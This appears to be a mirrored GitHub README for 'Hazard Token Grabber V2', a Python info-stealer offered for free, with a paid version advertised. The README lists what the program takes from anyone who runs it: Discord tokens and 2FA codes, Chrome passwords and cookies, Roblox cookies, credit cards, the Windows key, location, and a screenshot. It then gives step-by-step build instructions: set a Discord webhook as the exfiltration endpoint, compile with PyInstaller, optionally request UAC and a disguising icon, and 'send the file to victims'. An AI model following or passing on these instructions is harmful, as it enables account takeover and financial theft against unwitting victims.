Git Product home page Git Product logo

hazard-token-grabber-v2's Introduction

‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ 🌟 Star this Repository if you enjoy Hazard Stealer V2!

NOTE: This is a free software. It will not be undetected from antivirus software, or have custom features. Remember, this is 100% free. If you want a better one, join CheatAway and purchase one.


Hazard-Token-Grabber-V2 was made by

Love ❌ code ✅

When someone executes the file, the following info will be sent to you:

  • User Name.
  • Computer Name.
  • Windows Product Key & Build Info.
  • IP & Geolocation. (Country, City, Google Maps Location)
  • A screenshot taken when they ran the file.
  • Roblox Cookies.
  • All valid/working discord tokens. (Bypasses BetterDiscord, Token Protector and Discord's new encryption)
  • Discord 2FA Codes for accounts with 2FA enabled.
  • Their Passwords & Credit Cards for Discord. (updates when they change it)
  • All Passwords and Cookies from the Chrome Browser.

The webhook notification looks like this:

📁・Setting up Hazard Token Grabber.V2

  1. Install python if you have not already. (Link Here)
  2. Replace "WEBHOOK_HERE" with a discord webhook you've created. (Keep the quotes around the webhook)
  3. Double Click setup.bat and allow it to finish.
  4. A Window will open prompting for a name. Put something in such as "Token_Logger" (You can always rename the file later)
  5. Send the file to victims. 😈

⚙・Manually Compiling Source Code

If you do not want to use the batch file, you can follow this guide:

  1. Open command prompt in the same directory as the .py file.
  2. Type pip install -r requirements.txt (To install the modules)
  3. Type: pyinstaller --clean --onefile -w main.py, you will see a lot of text popping up. Ignore it and wait.
  4. After it says its finishing, you can find the EXE file in the dist directory, located in the project root!

💾・ More options

Add these into the command when creating the exe if you want

PyInstaller Options
-n name The name of the compiled EXE (Defaults to the name of the original .py file)
-i icon.ico The icon. You can specify a directory to an icon file, or do NONE for a default EXE icon.
--clean Removes all temporary files so you only have what you need.
--uac-admin Modified the MANIFEST so that it will request UAC permissions upon running.
--hidden-import MODULENAME Adds a module without it being present in the script.

hazard-token-grabber-v2's People

Contributors

fossabot avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.